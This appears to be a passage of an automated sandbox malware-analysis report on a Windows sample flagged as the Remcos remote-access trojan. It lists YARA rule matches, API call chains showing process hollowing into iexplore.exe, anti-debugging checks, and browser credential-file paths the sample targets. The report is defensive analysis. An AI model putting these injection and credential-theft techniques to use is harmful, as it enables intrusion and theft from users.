            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0043E2FB2_2_0043E2FB
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0045332B2_2_0045332B
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0042739D2_2_0042739D
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004374E62_2_004374E6
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0043E5582_2_0043E558
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004387702_2_00438770
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004378FE2_2_004378FE
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004339462_2_00433946
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0044D9C92_2_0044D9C9
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00427A462_2_00427A46
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041DB622_2_0041DB62
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00427BAF2_2_00427BAF
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00437D332_2_00437D33
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00435E5E2_2_00435E5E
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00426E0E2_2_00426E0E
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0043DE9D2_2_0043DE9D
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00413FCA2_2_00413FCA
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00436FEA2_2_00436FEA
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 00401E65 appears 34 times
            Source: 1vQ6RSHmz5.exe, 00000000.00000002.1240796321.0000000000405000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename30.exe vs 1vQ6RSHmz5.exe
            Source: 1vQ6RSHmz5.exeBinary or memory string: OriginalFilename30.exe vs 1vQ6RSHmz5.exe
            Source: 1vQ6RSHmz5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 1vQ6RSHmz5.exeBinary or memory string: @*\AC:\Users\Pc\Desktop\va6lio\Project1.vbp
            Source: 1vQ6RSHmz5.exeBinary or memory string: @@@*\AC:\Users\Pc\Desktop\va6lio\Project1.vbp`
            Source: 1vQ6RSHmz5.exe, 00000000.00000002.1240782790.0000000000404000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: @*\AC:\Users\Pc\Desktop\va6lio\Project1.vbp
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@3/0@2/2
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_00417952
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,2_2_0040F474
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_0041B4A8
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041AA4A
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMutant created: NULL
            Source: 1vQ6RSHmz5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 1vQ6RSHmz5.exeVirustotal: Detection: 24%
            Source: unknownProcess created: C:\Users\user\Desktop\1vQ6RSHmz5.exe "C:\Users\user\Desktop\1vQ6RSHmz5.exe"
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CB50
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0048FD78 push eax; retf 0046h0_3_0048FD79
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0048FD78 push eax; retf 0046h0_3_0048FD79
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00490FFC push eax; retf 0046h0_3_00490FFD
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00490FFC push eax; retf 0046h0_3_00490FFD
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0048FD78 push eax; retf 0046h0_3_0048FD79
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0048FD78 push eax; retf 0046h0_3_0048FD79
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00490FFC push eax; retf 0046h0_3_00490FFD
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00490FFC push eax; retf 0046h0_3_00490FFD
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00406EB0 ShellExecuteW,URLDownloadToFileW,2_2_00406EB0
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041AA4A
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CB50
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040F7A7 Sleep,ExitProcess,2_2_0040F7A7
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_0041A748
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 8.5 %
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exe TID: 6540Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exe TID: 6672Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409253
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C291
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C34D
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409665
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0044E879 FindFirstFileExA,2_2_0044E879
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_0040880C
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040783C FindFirstFileW,FindNextFileW,2_2_0040783C
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419AF5
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB30
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD37
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407C97
            Source: iexplore.exe, 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: 1vQ6RSHmz5.exe, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240900608.000000000045D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239123601.000000000048D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240979742.000000000048F000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_2-48494
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004349F9
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CB50
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004432B5 mov eax, dword ptr fs:[00000030h]2_2_004432B5
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00412077 GetProcessHeap,HeapFree,2_2_00412077
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004349F9
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00434B47 SetUnhandledExceptionFilter,2_2_00434B47
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043BB22
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeSection unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 459000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 471000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 477000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 478000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 479000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 47E000Jump to behavior
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 9A7008Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_004120F7
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00419627 mouse_event,2_2_00419627
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00434C52 cpuid 2_2_00434C52
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,2_2_00452036
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_004520C3
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,2_2_00452313
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,2_2_00448404
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0045243C
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,2_2_00452543
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00452610
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_0040F8D1
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,2_2_004488ED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00451CD8
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,2_2_00451F50
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesW,2_2_00451F9B
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00404F51 GetLocalTime,CreateEventA,CreateThread,2_2_00404F51
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041B60D GetUserNameW,2_2_0041B60D
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,2_2_00449190

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTR
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040BA12
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040BB30
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: \key3.db2_2_0040BB30

            Remote Access Functionality

            barindex
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-1VT363Jump to behavior
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTR
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: cmd.exe2_2_0040569A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
